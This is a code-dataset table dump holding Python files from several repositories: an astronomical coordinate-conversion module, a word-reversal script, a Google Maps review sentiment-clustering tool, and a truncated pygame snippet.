blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
45576ef9da9da86d57d05b3f6633784b1017820e | Python | transientskp/tkp | /tkp/utility/coordinates.py | UTF-8 | 20,422 | 2.90625 | 3 | [
"BSD-2-Clause"
] | permissive | #
# LOFAR Transients Key Project
"""
General purpose astronomical coordinate handling routines.
"""
import datetime
import logging
import math
import sys
import pytz
from astropy import wcs as pywcs
from casacore.measures import measures
from casacore.quanta import quantity
logger = logging.getLogger(__name__)
# Note that we take a +ve longitude as WEST.
CORE_LAT = 52.9088
CORE_LON = -6.8689
# ITRF position of CS002
# Should be a good approximation for anything refering to the LOFAR core.
ITRF_X = 3826577.066110000
ITRF_Y = 461022.947639000
ITRF_Z = 5064892.786
# Useful constants
SECONDS_IN_HOUR = 60 ** 2
SECONDS_IN_DAY = 24 * SECONDS_IN_HOUR
def julian_date(time=None, modified=False):
"""
Calculate the Julian date at a given timestamp.
Args:
time (datetime.datetime): Timestamp to calculate JD for.
modified (bool): If True, return the Modified Julian Date:
the number of days (including fractions) which have elapsed between
the start of 17 November 1858 AD and the specified time.
Returns:
float: Julian date value.
"""
if not time:
time = datetime.datetime.now(pytz.utc)
mjdstart = datetime.datetime(1858, 11, 17, tzinfo=pytz.utc)
mjd = time - mjdstart
mjd_daynumber = (mjd.days + mjd.seconds / (24. * 60 ** 2) +
mjd.microseconds / (24. * 60 ** 2 * 1000 ** 2))
if modified:
return mjd_daynumber
return 2400000.5 + mjd_daynumber
def mjd2datetime(mjd):
"""
Convert a Modified Julian Date to datetime via 'unix time' representation.
NB 'unix time' is defined by the casacore/casacore package.
"""
q = quantity("%sd" % mjd)
return datetime.datetime.fromtimestamp(q.to_unix_time())
def mjd2lst(mjd, position=None):
"""
Converts a Modified Julian Date into Local Apparent Sidereal Time in
seconds at a given position. If position is None, we default to the
reference position of CS002.
mjd -- Modified Julian Date (float, in days)
position -- Position (casacore measure)
"""
dm = measures()
position = position or dm.position(
"ITRF", "%fm" % ITRF_X, "%fm" % ITRF_Y, "%fm" % ITRF_Z
)
dm.do_frame(position)
last = dm.measure(dm.epoch("UTC", "%fd" % mjd), "LAST")
fractional_day = last['m0']['value'] % 1
return fractional_day * 24 * SECONDS_IN_HOUR
def mjds2lst(mjds, position=None):
"""
As mjd2lst(), but takes an argument in seconds rather than days.
Args:
mjds (float):Modified Julian Date (in seconds)
position (casacore measure): Position for LST calcs
"""
return mjd2lst(mjds / SECONDS_IN_DAY, position)
def jd2lst(jd, position=None):
"""
Converts a Julian Date into Local Apparent Sidereal Time in seconds at a
given position. If position is None, we default to the reference position
of CS002.
Args:
jd (float): Julian Date
position (casacore measure): Position for LST calcs.
"""
return mjd2lst(jd - 2400000.5, position)
# NB: datetime is not sensitive to leap seconds.
# However, leap seconds were first introduced in 1972.
# So there are no leap seconds between the start of the
# Modified Julian epoch and the start of the Unix epoch,
# so this calculation is safe.
# julian_epoch = datetime.datetime(1858, 11, 17)
# unix_epoch = datetime.datetime(1970, 1, 1, 0, 0)
# delta = unix_epoch - julian_epoch
# deltaseconds = delta.total_seconds()
# unix_epoch = 3506716800
# The above is equivalent to this:
unix_epoch = quantity("1970-01-01T00:00:00").get_value('s')
def julian2unix(timestamp):
"""
Convert a modifed julian timestamp (number of seconds since 17 November
1858) to Unix timestamp (number of seconds since 1 January 1970).
Args:
timestamp (numbers.Number): Number of seconds since the Unix epoch.
Returns:
numbers.Number: Number of seconds since the modified Julian epoch.
"""
return timestamp - unix_epoch
def unix2julian(timestamp):
"""
Convert a Unix timestamp (number of seconds since 1 January 1970) to a
modified Julian timestamp (number of seconds since 17 November 1858).
Args:
timestamp (numbers.Number): Number of seconds since the modified
Julian epoch.
Returns:
numbers.Number: Number of seconds since the Unix epoch.
"""
return timestamp + unix_epoch
def sec2deg(seconds):
"""Seconds of time to degrees of arc"""
return 15.0 * seconds / 3600.0
def sec2days(seconds):
"""Seconds to number of days"""
return seconds / (24.0 * 3600)
def sec2hms(seconds):
"""Seconds to hours, minutes, seconds"""
hours, seconds = divmod(seconds, 60 ** 2)
minutes, seconds = divmod(seconds, 60)
return (int(hours), int(minutes), seconds)
def altaz(mjds, ra, dec, lat=CORE_LAT):
"""Calculates the azimuth and elevation of source from time and position
on sky. Takes MJD in seconds and ra, dec in degrees. Returns (alt, az) in
degrees."""
# compute hour angle in degrees
ha = mjds2lst(mjds) - ra
if (ha < 0):
ha = ha + 360
# convert degrees to radians
ha, dec, lat = [math.radians(value) for value in (ha, dec, lat)]
# compute altitude in radians
sin_alt = (math.sin(dec) * math.sin(lat) +
math.cos(dec) * math.cos(lat) * math.cos(ha))
alt = math.asin(sin_alt)
# compute azimuth in radians
# divide by zero error at poles or if alt = 90 deg
cos_az = ((math.sin(dec) - math.sin(alt) * math.sin(lat)) /
(math.cos(alt) * math.cos(lat)))
az = math.acos(cos_az)
# convert radians to degrees
hrz_altitude, hrz_azimuth = [math.degrees(value) for value in (alt, az)]
# choose hemisphere
if (math.sin(ha) > 0):
hrz_azimuth = 360 - hrz_azimuth
return hrz_altitude, hrz_azimuth
def ratohms(radegs):
"""Convert RA in decimal degrees format to hours, minutes,
seconds format.
Keyword arguments:
radegs -- RA in degrees format
Return value:
ra -- tuple of 3 values, [hours,minutes,seconds]
"""
radegs %= 360
raseconds = radegs * 3600 / 15.0
return sec2hms(raseconds)
def dectodms(decdegs):
"""Convert Declination in decimal degrees format to hours, minutes,
seconds format.
Keyword arguments:
decdegs -- Dec. in degrees format
Return value:
dec -- list of 3 values, [degrees,minutes,seconds]
"""
sign = -1 if decdegs < 0 else 1
decdegs = abs(decdegs)
if decdegs > 90:
raise ValueError("coordinate out of range")
decd = int(decdegs)
decm = int((decdegs - decd) * 60)
decs = (((decdegs - decd) * 60) - decm) * 60
# Necessary because of potential roundoff errors
if decs - 60 > -1e-7:
decm += 1
decs = 0
if decm == 60:
decd += 1
decm = 0
if decd > 90:
raise ValueError("coordinate out of range")
if sign == -1:
if decd == 0:
if decm == 0:
decs = -decs
else:
decm = -decm
else:
decd = -decd
return (decd, decm, decs)
def propagate_sign(val1, val2, val3):
"""
casacore (reasonably enough) demands that a minus sign (if required)
comes at the start of the quantity. Thus "-0D30M" rather than "0D-30M".
Python regards "-0" as equal to "0"; we need to split off a separate sign
field.
If more than one of our inputs is negative, it's not clear what the user
meant: we raise.
Args:
val1(float): (,val2,val3) input values (hour/min/sec or deg/min/sec)
Returns:
tuple: "+" or "-" string denoting sign,
val1, val2, val3 (numeric) denoting absolute values of inputs.
"""
signs = [x < 0 for x in (val1, val2, val3)]
if signs.count(True) == 0:
sign = "+"
elif signs.count(True) == 1:
sign, val1, val2, val3 = "-", abs(val1), abs(val2), abs(val3)
else:
raise ValueError("Too many negative coordinates")
return sign, val1, val2, val3
def hmstora(rah, ram, ras):
"""Convert RA in hours, minutes, seconds format to decimal
degrees format.
Keyword arguments:
rah,ram,ras -- RA values (h,m,s)
Return value:
radegs -- RA in decimal degrees
"""
sign, rah, ram, ras = propagate_sign(rah, ram, ras)
ra = quantity("%s%dH%dM%f" % (sign, rah, ram, ras)).get_value()
if abs(ra) >= 360:
raise ValueError("coordinates out of range")
return ra
def dmstodec(decd, decm, decs):
"""Convert Dec in degrees, minutes, seconds format to decimal
degrees format.
Keyword arguments:
decd, decm, decs -- list of Dec values (d,m,s)
Return value:
decdegs -- Dec in decimal degrees
"""
sign, decd, decm, decs = propagate_sign(decd, decm, decs)
dec = quantity("%s%dD%dM%f" % (sign, decd, decm, decs)).get_value()
if abs(dec) > 90:
raise ValueError("coordinates out of range")
return dec
def cmp(a, b):
return (a > b) - (a < b)
def angsep(ra1, dec1, ra2, dec2):
"""Find the angular separation of two sources, in arcseconds,
using the proper spherical trig formula
Keyword arguments:
ra1,dec1 - RA and Dec of the first source, in decimal degrees
ra2,dec2 - RA and Dec of the second source, in decimal degrees
Return value:
angsep - Angular separation, in arcseconds
"""
b = (math.pi / 2) - math.radians(dec1)
c = (math.pi / 2) - math.radians(dec2)
temp = (math.cos(b) * math.cos(c)) + (
math.sin(b) * math.sin(c) * math.cos(math.radians(ra1 - ra2)))
# Truncate the value of temp at +- 1: it makes no sense to do math.acos()
# of a value outside this range, but occasionally we might get one due to
# rounding errors.
if abs(temp) > 1.0:
temp = 1.0 * cmp(temp, 0)
return 3600 * math.degrees(math.acos(temp))
def alphasep(ra1, ra2, dec1, dec2):
"""Find the angular separation of two sources in RA, in arcseconds
Keyword arguments:
ra1,dec1 - RA and Dec of the first source, in decimal degrees
ra2,dec2 - RA and Dec of the second source, in decimal degrees
Return value:
angsep - Angular separation, in arcseconds
"""
return 3600 * (ra1 - ra2) * math.cos(math.radians((dec1 + dec2) / 2.0))
def deltasep(dec1, dec2):
"""Find the angular separation of two sources in Dec, in arcseconds
Keyword arguments:
dec1 - Dec of the first source, in decimal degrees
dec2 - Dec of the second source, in decimal degrees
Return value:
angsep - Angular separation, in arcseconds
"""
return 3600 * (dec1 - dec2)
# Find angular separation in Dec of 2 positions, in arcseconds
def alpha(l, m, alpha0, delta0):
"""Convert a coordinate in l,m into an coordinate in RA
Keyword arguments:
l,m -- direction cosines, given by (offset in cells) x cellsi (radians)
alpha_0, delta_0 -- centre of the field
Return value:
alpha -- RA in decimal degrees
"""
return (alpha0 + (math.degrees(math.atan2(l, (
(math.sqrt(1 - (l * l) - (m * m)) * math.cos(math.radians(delta0))) -
(m * math.sin(math.radians(delta0))))))))
def alpha_inflate(theta, decl):
"""Compute the ra expansion for a given theta at a given declination
Keyword arguments:
theta, decl are both in decimal degrees.
Return value:
alpha -- RA inflation in decimal degrees
For a derivation, see MSR TR 2006 52, Section 2.1
http://research.microsoft.com/apps/pubs/default.aspx?id=64524
"""
if abs(decl) + theta > 89.9:
return 180.0
else:
return math.degrees(abs(math.atan(
math.sin(math.radians(theta)) / math.sqrt(abs(
math.cos(math.radians(decl - theta)) * math.cos(
math.radians(decl + theta)))))))
# Find the RA of a point in a radio image, given l,m and field centre
def delta(l, m, delta0):
"""Convert a coordinate in l, m into an coordinate in Dec
Keyword arguments:
l, m -- direction cosines, given by (offset in cells) x cellsi (radians)
alpha_0, delta_0 -- centre of the field
Return value:
delta -- Dec in decimal degrees
"""
return math.degrees(math.asin(m * math.cos(math.radians(delta0)) +
(math.sqrt(1 - (l * l) - (m * m)) *
math.sin(math.radians(delta0)))))
def l(ra, dec, cra, incr):
"""Convert a coordinate in RA,Dec into a direction cosine l
Keyword arguments:
ra,dec -- Source location
cra -- RA centre of the field
incr -- number of degrees per pixel (negative in the case of RA)
Return value:
l -- Direction cosine
"""
return ((math.cos(math.radians(dec)) * math.sin(math.radians(ra - cra))) /
(math.radians(incr)))
def m(ra, dec, cra, cdec, incr):
"""Convert a coordinate in RA,Dec into a direction cosine m
Keyword arguments:
ra,dec -- Source location
cra,cdec -- centre of the field
incr -- number of degrees per pixel
Return value:
m -- direction cosine
"""
return ((math.sin(math.radians(dec)) * math.cos(math.radians(cdec))) -
(math.cos(math.radians(dec)) * math.sin(math.radians(cdec)) *
math.cos(math.radians(ra - cra)))) / math.radians(incr)
def lm_to_radec(ra0, dec0, l, m):
"""
Find the l direction cosine in a radio image, given an RA and Dec and the
field centre
"""
# This function should be the inverse of radec_to_lmn, but it is
# not. There is likely an error here.
sind0 = math.sin(dec0)
cosd0 = math.cos(dec0)
dl = l
dm = m
d0 = dm * dm * sind0 * sind0 + dl * dl - 2 * dm * cosd0 * sind0
sind = math.sqrt(abs(sind0 * sind0 - d0))
cosd = math.sqrt(abs(cosd0 * cosd0 + d0))
if (sind0 > 0):
sind = abs(sind)
else:
sind = -abs(sind)
dec = math.atan2(sind, cosd)
if l != 0:
ra = math.atan2(-dl, (cosd0 - dm * sind0)) + ra0
else:
ra = math.atan2((1e-10), (cosd0 - dm * sind0)) + ra0
# Calculate RA,Dec from l,m and phase center. Note: As done in
# Meqtrees, which seems to differ from l, m functions above. Meqtrees
# equation may have problems, judging from my difficulty fitting a
# fringe to L4086 data. Pandey's equation is now used in radec_to_lmn
return (ra, dec)
def radec_to_lmn(ra0, dec0, ra, dec):
l = math.cos(dec) * math.sin(ra - ra0)
sind0 = math.sin(dec0)
if sind0 != 0:
# from pandey; gives same results for casa and cyga
m = (math.sin(dec) * math.cos(dec0) -
math.cos(dec) * math.sin(dec0) * math.cos(ra - ra0))
else:
m = 0
n = math.sqrt(1 - l ** 2 - m ** 2)
return (l, m, n)
def eq_to_gal(ra, dec):
"""Find the Galactic co-ordinates of a source given the equatorial
co-ordinates
Keyword arguments:
(alpha,delta) -- RA, Dec in decimal degrees
Return value:
(l,b) -- Galactic longitude and latitude, in decimal degrees
"""
dm = measures()
result = dm.measure(
dm.direction("J200", "%fdeg" % ra, "%fdeg" % dec),
"GALACTIC"
)
lon_l = math.degrees(result['m0']['value']) % 360 # 0 < ra < 360
lat_b = math.degrees(result['m1']['value'])
return lon_l, lat_b
def gal_to_eq(lon_l, lat_b):
"""Find the Galactic co-ordinates of a source given the equatorial
co-ordinates
Keyword arguments:
(l, b) -- Galactic longitude and latitude, in decimal degrees
Return value:
(alpha, delta) -- RA, Dec in decimal degrees
"""
dm = measures()
result = dm.measure(
dm.direction("GALACTIC", "%fdeg" % lon_l, "%fdeg" % lat_b),
"J2000"
)
ra = math.degrees(result['m0']['value']) % 360 # 0 < ra < 360
dec = math.degrees(result['m1']['value'])
return ra, dec
def eq_to_cart(ra, dec):
"""Find the cartesian co-ordinates on the unit sphere given the eq. co-ords.
ra, dec should be in degrees.
"""
return (
math.cos(math.radians(dec)) * math.cos(math.radians(ra)), # Cartesian x
math.cos(math.radians(dec)) * math.sin(math.radians(ra)), # Cartesian y
math.sin(math.radians(dec))) # Cartesian z
class CoordSystem(object):
"""A container for constant strings representing different coordinate
systems."""
FK4 = "B1950 (FK4)"
FK5 = "J2000 (FK5)"
def coordsystem(name):
"""Given a string, return a constant from class CoordSystem."""
mappings = {
'j2000': CoordSystem.FK5,
'fk5': CoordSystem.FK5,
CoordSystem.FK5.lower(): CoordSystem.FK5,
'b1950': CoordSystem.FK4,
'fk4': CoordSystem.FK4,
CoordSystem.FK4.lower(): CoordSystem.FK4
}
return mappings[name.lower()]
def convert_coordsystem(ra, dec, insys, outsys):
"""
Convert RA & dec (given in decimal degrees) between equinoxes.
"""
dm = measures()
if insys == CoordSystem.FK4:
insys = "B1950"
elif insys == CoordSystem.FK5:
insys = "J2000"
else:
raise Exception("Unknown Coordinate System")
if outsys == CoordSystem.FK4:
outsys = "B1950"
elif outsys == CoordSystem.FK5:
outsys = "J2000"
else:
raise Exception("Unknown Coordinate System")
result = dm.measure(
dm.direction(insys, "%fdeg" % ra, "%fdeg" % dec),
outsys
)
ra = math.degrees(result['m0']['value']) % 360 # 0 < ra < 360
dec = math.degrees(result['m1']['value'])
return ra, dec
class WCS(object):
"""
Wrapper around pywcs.WCS.
This is primarily to preserve API compatibility with the earlier,
home-brewed python-wcslib wrapper. It includes:
* A fix for the reference pixel lying at the zenith;
* Raises ValueError if coordinates are invalid.
"""
# ORIGIN is the upper-left corner of the image. pywcs supports both 0
# (NumPy, C-style) or 1 (FITS, Fortran-style). The TraP uses 1.
ORIGIN = 1
# We can set these attributes on the pywcs.WCS().wcs object to configure
# the coordinate system.
WCS_ATTRS = ("crpix", "cdelt", "crval", "ctype", "cunit", "crota")
def __init__(self):
# Currently, we only support two dimensional images.
self.wcs = pywcs.WCS(naxis=2)
def __setattr__(self, attrname, value):
if attrname in self.WCS_ATTRS:
# Account for arbitrary coordinate rotations in images pointing at
# the North Celestial Pole. We set the reference direction to
# infintesimally less than 90 degrees to avoid any ambiguity. See
# discussion at #4599.
if attrname == "crval" and (
value[1] == 90 or value[1] == math.pi / 2):
value = (value[0], value[1] * (1 - sys.float_info.epsilon))
self.wcs.wcs.__setattr__(attrname, value)
else:
super(WCS, self).__setattr__(attrname, value)
def __getattr__(self, attrname):
if attrname in self.WCS_ATTRS:
return getattr(self.wcs.wcs, attrname)
else:
super(WCS, self).__getattr__(attrname)
def p2s(self, pixpos):
"""
Pixel to Spatial coordinate conversion.
Args:
pixpos (tuple): [x, y] pixel position
Returns:
tuple: ra (float) Right ascension corresponding to position [x, y]
dec (float) Declination corresponding to position [x, y]
"""
ra, dec = self.wcs.wcs_pix2world(pixpos[0], pixpos[1], self.ORIGIN)
if math.isnan(ra) or math.isnan(dec):
raise RuntimeError("Spatial position is not a number")
return float(ra), float(dec)
def s2p(self, spatialpos):
"""
Spatial to Pixel coordinate conversion.
Args:
pixpos (tuple): [ra, dec] spatial position
Returns:
tuple: X pixel value corresponding to position [ra, dec],
Y pixel value corresponding to position [ra, dec]
"""
x, y = self.wcs.wcs_world2pix(spatialpos[0], spatialpos[1], self.ORIGIN)
if math.isnan(x) or math.isnan(y):
raise RuntimeError("Pixel position is not a number")
return float(x), float(y)
| true |
046719c95e3e1759e4b24efef4c0aca062e3cd10 | Python | hritik1330/GUVI | /hunter/set-10/94.py | UTF-8 | 96 | 3.234375 | 3 | [] | no_license | ss = list(input().split())
for i in range(len(ss)):
ss[i] = ss[i][::-1]
print(" ".join(ss))
| true |
b92c6c6e33d995fd87273751314705a721ce1cb2 | Python | andrewlarimer/location-buzz | /app/location_analyzer.py | UTF-8 | 15,603 | 2.578125 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
import googlemaps
import re
from sklearn.cluster import KMeans
from bert_serving.client import BertClient
import requests
import json
from collections import defaultdict, Counter
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import numpy as np
import pandas as pd
import os
import socket
def evaluate(CHAIN_NAME='starbucks', CITY_NAME='austin', RADIUS='50000'):
NEGATIVE_EMPHASIS = 2
N_CLUSTERS_PER_SENTI = 3
NUM_BERT_PODS = 3
gmaps_key = os.environ['GMAPS_API_KEY']
try:
bert_ip = socket.gethostbyname('bert.default')
print(f"Found bert IP: {bert_ip}")
except:
bert_ip = '127.0.0.1'
print(f"Did not find bert IP via DNS lookup. Defaulted to: {bert_ip}")
print(f"Trying to connect with Bert Server...")
bc = BertClient(ip=bert_ip, port=5555)
print(f"Established connection with Bert Server.")
print(f"Loading GMaps API Key.")
gm = googlemaps.Client(key=gmaps_key)
print(f"Loaded GMaps API Key.")
# ### Find the city's coordinates, then search for matching location names within a radius
city_search = gm.find_place(input=CITY_NAME, input_type='textquery', \
fields=['place_id'])
city_id = city_search['candidates'][0]['place_id']
city_details = gm.place(place_id=city_id, fields=['name','formatted_address',\
'geometry'])
city_lat = city_details['result']['geometry']['location']['lat']
city_long = city_details['result']['geometry']['location']['lng']
search_results = gm.places_nearby(location=(city_lat,city_long), radius=RADIUS, \
keyword=CHAIN_NAME)
print(f"Found {len(search_results['results'])} locations.")
# ### Isolate their Place IDs and search and fetch their reviews (currently top 20 locations)
loc_ids = list()
for location in search_results['results']:
loc_ids.append(location['place_id'])
loc_details = list()
for loc_id in loc_ids:
try:
loc_details.append(gm.place(place_id=loc_id, fields=["name", "formatted_address", "rating", "review"]))
except:
print(f"could not find place for location id: {loc_id}")
# ### Split the retrieved reviews by sentence, clean them, and prep them for encoding
seg_rev_list = []
seg_text = []
loc_addresses = []
seg_map_to_rev_and_loc = []
rev_text = []
rev_num = 0
for loc_idx, location_details in enumerate(loc_details):
loc_addresses.append(location_details['result']['formatted_address'])
for review in location_details['result']['reviews']:
this_review = review['text']
if this_review != "":
rev_text.append(this_review)
# Creating (review_segment, review_id) tuples for each segment in the reviews
for review_segment in re.findall(r"\w[\w’', %/:-?]+(?:.m.)?[\w’'% ,/:-]*", this_review):
if len(review_segment.strip()) < 2:
continue
# Counting if it's more than 20 tokens and splitting further if so
tokenized_review_segment = review_segment.split(' ')
if len(tokenized_review_segment) < 20:
seg_text.append(review_segment.strip())
seg_rev_list.append(review_segment.lower().strip())
seg_map_to_rev_and_loc.append((rev_num,loc_idx))
else:
while len(tokenized_review_segment) >= 20:
review_start = " ".join(tokenized_review_segment[:20])
seg_text.append(review_start.strip())
seg_rev_list.append(review_start.lower().strip())
seg_map_to_rev_and_loc.append((rev_num,loc_idx))
tokenized_review_segment = tokenized_review_segment[20:]
rev_num += 1
print(f"Requesting embeddings of {len(seg_rev_list)} review segments.")
# ### Get the BERT embeddings
seg_encodings = bc.encode(seg_rev_list, show_tokens=False)
# ### Get sentiment embeddings
print(f"Accumulating sentiment of {len(seg_rev_list)} review segments and locations.")
sentibot = SentimentIntensityAnalyzer()
seg_senti = []
rev_dict_cumm_senti = defaultdict(lambda: (float(), [])) #float for accumulated sentiment, list for seg indices
loc_dict_cumm_senti = defaultdict(lambda: (float(), []))
for i, segmented_review in enumerate(seg_rev_list):
senti_result = sentibot.polarity_scores(segmented_review)
this_senti = senti_result['pos'] - senti_result['neg'] * NEGATIVE_EMPHASIS
rev_senti_so_far, rev_indices_so_far = rev_dict_cumm_senti[seg_map_to_rev_and_loc[i][0]]
rev_dict_cumm_senti[seg_map_to_rev_and_loc[i][0]] = (round(rev_senti_so_far + this_senti, 1), rev_indices_so_far + [i])
loc_senti_so_far, loc_indices_so_far = loc_dict_cumm_senti[seg_map_to_rev_and_loc[i][1]]
loc_dict_cumm_senti[seg_map_to_rev_and_loc[i][1]] = (round(loc_senti_so_far + this_senti, 1), loc_indices_so_far + [i])
positive_indices = []
neutral_indices = []
negative_indices = []
for k, v in rev_dict_cumm_senti.items():
cumm_senti, this_indices = v
if cumm_senti < 0:
negative_indices += this_indices
elif cumm_senti < 1:
neutral_indices += this_indices
elif cumm_senti >= 1:
positive_indices += this_indices
# ### Concatenate sentiment embeddings with the BERT embeddings
# print(f"Combining embeddings and sentiment...")
# aug_encodings = []
# current_idx = (None, None)
# current_sentiment = [0] * 3
# current_bert = [0] * 768
# current_bert_norm = 0
# new_lists_index = 0
# sent_scores_by_list_of_ids_idx = defaultdict(int)
# positive_indices = []
# neutral_indices = []
# negative_indices = []
# for i, encoding in enumerate(seg_encodings):
# if seg_map_to_rev_and_loc[i] == current_idx:
# # We are continuing with more parts of a review, so we add the sentiment
# senti = seg_senti[i]
# current_sentiment = np.add(current_sentiment, np.multiply([senti['pos'], senti['neu'], senti['neg']], SENTIMENT_EMPHASIS))
# # We want the topic encoding with the largest magnitude from each review.
# this_norm = np.linalg.norm(encoding)
# if this_norm > current_bert_norm:
# current_bert_norm = this_norm
# current_bert = encoding
# # Comment out above and uncomment below to have cummulative topic encodings
# #current_bert = np.add(current_bert, encoding)
# else:
# # We are dealing with a new topic, so we add the previous topic.
# if current_bert_norm > 0:
# aug_encodings.append(np.append(current_bert,current_sentiment))
# # Add to the score accumulation by location
# cumm_senti_rating = round(current_sentiment[0] - current_sentiment[2],2)
# sent_scores_by_list_of_ids_idx[seg_map_to_rev_and_loc[i][1]] = round(sent_scores_by_list_of_ids_idx[seg_map_to_rev_and_loc[i][1]] + cumm_senti_rating, 1)
# #Sort this index by sentiment.
# if cumm_senti_rating < -3:
# negative_indices.append(new_lists_index)
# elif cumm_senti_rating < 3:
# neutral_indices.append(new_lists_index)
# elif cumm_senti_rating >= 3:
# positive_indices.append(new_lists_index)
# new_lists_index += 1
# # Reset our per-review scores to this one.
# current_bert_norm = np.linalg.norm(encoding)
# current_bert = encoding
# senti = seg_senti[i]
# current_sentiment = np.multiply([senti['pos'], senti['neu'], senti['neg']], SENTIMENT_EMPHASIS)
# current_idx = seg_map_to_rev_and_loc[i]
# Repeat this one last time for the last encoding
# aug_encodings.append(np.append(current_bert,current_sentiment))
# if cumm_senti_rating < -3:
# negative_indices.append(new_lists_index)
# elif cumm_senti_rating < 3:
# neutral_indices.append(new_lists_index)
# elif cumm_senti_rating >= 3:
# positive_indices.append(new_lists_index)
def cluster_from_indices(indices_list, input_encodings = seg_encodings, input_text =seg_text, n_clusters=N_CLUSTERS_PER_SENTI):
encodings = []
text = []
for idx in indices_list:
encodings.append(input_encodings[idx])
text.append(input_text[idx])
if len(encodings) < 3:
n_clusters = len(encodings)
km = KMeans(n_clusters=n_clusters, max_iter=2400)
seg_labels = km.fit_predict(encodings)
seg_distances_to_all_ks = km.transform(encodings)
seg_distance_to_nearest_k = []
for i, label in enumerate(seg_labels):
seg_distance_to_nearest_k.append(seg_distances_to_all_ks[i,label])
return seg_labels, seg_distance_to_nearest_k, text
pos_clust_labels, pos_clust_dist, pos_clust_text = cluster_from_indices(positive_indices)
neu_clust_labels, neu_clust_dist, neu_clust_text = cluster_from_indices(neutral_indices)
neg_clust_labels, neg_clust_dist, neg_clust_text = cluster_from_indices(negative_indices)
# ### Identify Most Common Clustering Results
stopwords = {"i", "me", "my", "myself", "we", "our", "ours", "ourselves",
"you", "your", "yours", "yourself", "yourselves", "he", "him",
"his", "himself", "she", "her", "hers", "herself", "it", "its",
"itself", "they", "them", "their", "theirs", "themselves", "what",
"which", "who", "whom", "this", "that", "these", "those", "am", "is",
"are", "was", "were", "be", "been", "being", "have", "has", "had",
"having", "do", "does", "did", "doing", "a", "an", "the", "and",
"but", "if", "or", "because", "as", "until", "while", "of", "at",
"by", "for", "with", "about", "against", "between", "into",
"through", "during", "before", "after", "above", "below", "to",
"from", "up", "down", "in", "out", "on", "off", "over", "under",
"again", "further", "then", "once", "here", "there", "when", "where",
"why", "how", "all", "any", "both", "each", "few", "more", "most",
"other", "some", "such", "no", "nor", "not", "only", "own", "same",
"so", "than", "too", "very", "didn", "s", "t", "can", "will", "just",
"should", "", "best", "top", "unbelievable", "see", "xa", "br",
"ul", "li", ".", "it's", "m", "re", "ve", "d", CHAIN_NAME.lower()}
def get_most_common_words_per_cluster(cluster_labels, cluster_text, stop_ws = stopwords):
cluster_word_counters = defaultdict(Counter)
for idx, this_review in enumerate(cluster_text):
for token in re.findall(r"[\w]+", this_review):
if token.lower() not in stop_ws:
cluster_word_counters[cluster_labels[idx]][token] += 1
return [v_counter.most_common(3) for k, v_counter in cluster_word_counters.items()]
pos_most_common = get_most_common_words_per_cluster(pos_clust_labels, pos_clust_text)
neu_most_common = get_most_common_words_per_cluster(neu_clust_labels, neu_clust_text)
neg_most_common = get_most_common_words_per_cluster(neg_clust_labels, neg_clust_text)
def package_for_return(labels, seg_text, rev_text, most_common_words, clust_dist, indices):
cluster_dict = defaultdict(dict)
full_text = []
loc_ids = []
rev_nums = []
used_reviews = set()
for i, seg in enumerate(seg_text):
original_seg_index = indices[i]
rev_num, loc_idx = seg_map_to_rev_and_loc[original_seg_index]
full_text.append(rev_text[rev_num])
loc_ids.append(loc_idx)
rev_nums.append(rev_num)
sort_order = np.argsort(np.array(clust_dist))
sorted_labels = list(np.array(labels)[sort_order])
sorted_seg_text = list(np.array(seg_text)[sort_order])
sorted_full_text = list(np.array(full_text)[sort_order])
sorted_loc_idx = list(np.array(loc_ids)[sort_order])
sorted_rev_num = list(np.array(rev_nums)[sort_order])
for idx, word_list in enumerate(most_common_words):
cluster_dict[idx]['most_common_words'] = word_list
cluster_dict[idx]['cluster_reviews'] = list()
for idx, label in enumerate(sorted_labels):
if sorted_rev_num[idx] not in used_reviews:
used_reviews.add(sorted_rev_num[idx])
match_string = r'(' + re.escape(sorted_seg_text[idx]) + r')'
new_text = re.sub(match_string, r'<strong>\1</strong>', sorted_full_text[idx])
cluster_dict[label]['cluster_reviews'].append(new_text + "" - Said about Location #" + str(sorted_loc_idx[idx] + 1))
return cluster_dict
# {cluster_id:
# {'most_common_words': [list,of,words],
# 'cluster_reviews': [list,of,review,texts]
# }
# }
pos_clusters = package_for_return(pos_clust_labels, pos_clust_text, rev_text, pos_most_common, pos_clust_dist, positive_indices)
neu_clusters = package_for_return(neu_clust_labels, neu_clust_text, rev_text, neu_most_common, neu_clust_dist, neutral_indices)
neg_clusters = package_for_return(neg_clust_labels, neg_clust_text, rev_text, neg_most_common, neg_clust_dist, negative_indices)
# review_clusters_top3 = dict()
# # for idx, label in enumerate(cluster_labels):
# # sentiment = round(aug_encodings[idx][-3] - aug_encodings[idx][-1], 1)
# # review_clusters[label].append((review_text[idx], sentiment)) #adding review text to each cluster
# for cluster_no, cluster_list in review_clusters.items():
# cluster_total_senti = 0
# word_counter = Counter()
# for review_seg, this_senti in cluster_list:
# cluster_total_senti += this_senti
# tokens = review_seg.lower().split(' ')
# for token in tokens:
# if token not in stopwords:
# word_counter[token] += 1
# avg_senti = cluster_total_senti / len(cluster_list)
# if avg_senti < -5:
# title_mod = "Negative"
# elif avg_senti < 5:
# title_mod = "Neutral"
# elif avg_senti >= 5:
# title_mod = "Positive"
# review_clusters_top3[cluster_no] = (title_mod, [x[0] for x in word_counter.most_common(3)])
# ### Ranked positivity score by location
sentiment_ranked_locations = sorted(loc_dict_cumm_senti.items(), key=lambda x: -x[1][0])
# ### Packaging things up to be returned
return_package = {'city_name': CITY_NAME, 'chain_name': CHAIN_NAME,
'location_addresses': loc_addresses,
'location_ranks_and_scores':sentiment_ranked_locations,
'pos_clusters':pos_clusters,
'neu_clusters':neu_clusters,
'neg_clusters':neg_clusters,
}
return return_package
| true |
42b15b419190f9a04b6571029058f973040a9075 | Python | Castor87/pacman | /teste_fontes.py | UTF-8 | 967 | 3.0625 | 3 | [] | no_license | import pygame
BRANCO = (255, 255, 255)
PRETO = (0, 0, 0)
AMARELO = (255, 255, 0)
VERMELHO = (255, 0, 0)
VERDE = (0, 255, 0)
pygame.init()
tela = pygame.display.set_mode((800, 600), 0)
score = 0
fonte = pygame.font.SysFont("calibri", 24, bold=True, italic=False)
while True:
texto = "Score: {}".format(score)
